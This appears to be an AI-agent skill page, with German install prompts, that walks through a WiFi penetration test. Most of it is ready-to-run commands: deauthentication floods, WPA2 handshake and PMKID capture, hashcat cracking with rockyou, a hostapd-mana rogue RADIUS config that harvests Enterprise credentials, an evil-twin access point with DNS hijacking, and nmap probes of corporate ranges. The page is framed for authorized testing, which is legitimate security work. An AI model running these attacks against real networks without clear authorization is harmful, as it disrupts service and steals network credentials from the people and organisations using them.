Execute a wireless network penetration test to assess WiFi security by capturing handshakes, cracking WPA2/WPA3 keys, detecting rogue access points, and testing wireless segmentation using Aircrack-ng and related tools.
Standardmäßig ist der Prompt ausgewählt, der zuerst die Quelle prüft. Sie können zu einem direkten Befehl wechseln oder eine lokale Kopie herunterladen.
Quelldateien prüfen
Lesen Sie SKILL.md und alle von SkillsMP angezeigten Begleitdateien, bevor Sie sich für eine Installation entscheiden.
Mit Codex oder Claude installieren Kopieren Sie diesen Prompt, fügen Sie ihn in Codex, Claude oder einen anderen Assistant ein und lassen Sie die Skill-Seite prüfen und installieren.
Ein direkter Befehl überspringt den Prüf-Prompt. Prüfen Sie die Quelle, bevor Sie ihn ausführen.
Execute a wireless network penetration test to assess WiFi security by capturing handshakes, cracking WPA2/WPA3 keys, detecting rogue access points, and testing wireless segmentation using Aircrack-ng and related tools.
Wireless penetration testing evaluates the security of an organization's WiFi infrastructure including encryption strength, authentication mechanisms, rogue access point detection, client isolation, and network segmentation. Testing covers 802.11a/b/g/n/ac/ax protocols, WPA2-PSK, WPA2-Enterprise, WPA3-SAE, captive portals, and Bluetooth/BLE where in scope.
When to Use
When conducting security assessments that involve performing wireless network penetration test
When following incident response procedures for related security events
When performing scheduled security testing or auditing activities
When validating security controls through hands-on testing
Most Often Missed & How to Confirm
PMKID capture before deauthing clients — hcxdumptool often pulls a crackable PMKID from the AP with no client present, avoiding disruptive deauth floods. Try it before forcing handshakes.
WPA2-Enterprise EAP attacks — a rogue RADIUS (hostapd-mana/EAPHammer) harvests MSCHAPv2 challenge-responses from clients that don't validate the server certificate; the missing cert validation is the real flaw. Don't skip Enterprise SSIDs as "safe".
WPS where still enabled — wash to find it, then Pixie-Dust (reaver -K) for offline PIN recovery; a fast, frequently overlooked win on consumer/printer APs.
Client isolation and segmentation after access — the high-impact finding is usually that the guest/IoT SSID reaches corporate hosts. Connect, then nmap toward the corporate range and test VLAN hopping.
Rogue/misconfigured APs and the whole facility — personal hotspots bridging to corp, default-config IoT, and rogue APs broadcasting the corporate SSID; survey from multiple physical vantage points, not one.
How to confirm: prove findings with the captured .cap/.pcapng plus the cracked PSK or EAP credential (hashcat -m 22000 / -m 5500), a wash/reaver WPS recovery, or a post-association nmap showing reachable corporate hosts from the wireless subnet. Don't conclude a network is uncrackable until you've tried both PMKID and 4-way handshake (and rogue RADIUS for Enterprise); don't conclude WiFi is contained until you've tested client isolation and wireless-to-wired segmentation.
Prerequisites
Written authorization specifying wireless scope (SSIDs, BSSIDs, physical locations)
# Discover all networks in range
airodump-ng wlan0mon -w wireless_scan --output-format csv,pcap
# Filter by specific channel
airodump-ng wlan0mon -c 6 -w channel6_scan
# Scan 5GHz band
airodump-ng wlan0mon --band a -w 5ghz_scan
# Scan all bands
airodump-ng wlan0mon --band abg -w full_scan
# Kismet passive scanning (advanced)
kismet -c wlan0mon
# Access web UI at http://localhost:2501
Network Inventory
SSID
BSSID
Channel
Encryption
Clients
Signal
CorpWiFi
AA:BB:CC:DD:EE:01
6
WPA2-Enterprise
45
-55dBm
CorpGuest
AA:BB:CC:DD:EE:02
11
WPA2-PSK
12
-60dBm
PrinterNet
AA:BB:CC:DD:EE:03
1
WEP
3
-70dBm
HiddenSSID
AA:BB:CC:DD:EE:04
36
WPA2-PSK
8
-65dBm
Phase 2 — WPA2-PSK Attack
Capture 4-Way Handshake
# Target specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:02 -w corpguest wlan0mon
# Deauthenticate a client to force reconnection (handshake capture)
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:02 -c FF:FF:FF:FF:FF:FF wlan0mon
# Verify handshake captured
aircrack-ng corpguest-01.cap
# Look for "1 handshake" in output
Crack WPA2 Key
# Dictionary attack with Aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt corpguest-01.cap
# GPU-accelerated cracking with Hashcat# Convert cap to hccapx format
hcxpcapngtool -o hash.hc22000 corpguest-01.cap
# Hashcat mode 22000 (WPA-PBKDF2-PMKID+EAPOL)
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule
# PMKID attack (no client needed)
hcxdumptool -i wlan0mon --enable_status=1 -o pmkid_dump.pcapng \
--filterlist_ap=AA:BB:CC:DD:EE:02 --filtermode=2
hcxpcapngtool -o pmkid_hash.hc22000 pmkid_dump.pcapng
hashcat -m 22000 pmkid_hash.hc22000 /usr/share/wordlists/rockyou.txt
Phase 3 — WPA2-Enterprise Attack
# Set up rogue AP with EAP credential harvesting# Using hostapd-manacat > hostapd-mana.conf << 'EOF'
interface=wlan0mon
ssid=CorpWiFi
hw_mode=g
channel=6
auth_algs=3
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
rsn_pairwise=CCMP
ieee8021x=1
eap_server=1
eap_user_file=hostapd.eap_user
mana_wpe=1
mana_credout=creds.txt
EOF
# EAP user filecat > hostapd.eap_user << 'EOF'
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAP "t" [2]
EOF
hostapd-mana hostapd-mana.conf
# Captured MSCHAP challenges can be cracked# Crack NetNTLMv1 from EAP-MSCHAP
hashcat -m 5500 creds.txt /usr/share/wordlists/rockyou.txt
Phase 4 — Evil Twin Attack
# Create evil twin with Bettercapsudo bettercap -iface wlan0mon
# Within Bettercap:
wifi.recon on
wifi.ap
# Or manual evil twin with hostapd + dnsmasqcat > evil_twin.conf << 'EOF'
interface=wlan1
ssid=CorpGuest
hw_mode=g
channel=6
driver=nl80211
auth_algs=1
wpa=0
EOF
# Start captive portal
hostapd evil_twin.conf &
dnsmasq --no-daemon --interface=wlan1 --dhcp-range=192.168.1.10,192.168.1.100,12h \
--address=/#/192.168.1.1
# Deauth clients from real AP to force connection to evil twin
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:02 wlan0mon
Phase 5 — Additional Tests
Rogue AP Detection
# Compare authorized AP list against discovered APs# Authorized BSSIDs from client documentation# Flag any unknown BSSIDs broadcasting corporate SSIDs# Check for misconfigured APs# Personal hotspots bridging to corporate network# IoT devices with default WiFi settings
Client Isolation Testing
# After connecting to guest network:# Scan for other clients
nmap -sn 192.168.10.0/24
# Attempt to reach corporate resources
nmap -sT -p 80,443,445,3389 10.0.0.0/24
# Test VLAN hopping# If guest network is not properly segmented from corporate